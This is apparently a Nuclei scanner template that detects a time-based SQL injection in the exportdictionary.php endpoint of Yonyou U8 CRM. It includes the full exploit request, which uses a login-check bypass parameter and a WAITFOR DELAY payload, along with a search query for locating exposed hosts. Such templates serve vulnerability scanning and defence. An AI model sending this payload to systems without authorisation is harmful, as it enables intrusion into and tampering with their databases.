id: yonyou-u8-crm-exportdictionary-sqli

info:
  name: 用友-U8-CRM-exportdictionary SQLI
  author: mask-git
  severity: high
  description: 用友-U8-CRM-exportdictionary SQL注入
  metadata:
    verified: true
    max-request: 1 
    hunter: app.name="用友 CRM"
  tags: yonyou,U8,crm,sqli

http:
  - raw:
      - |
        GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Accept: */*
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012

    matchers:
      - type: dsl
        dsl:
          - 'duration_1>=5'
          - 'status_code == 200'
        condition: and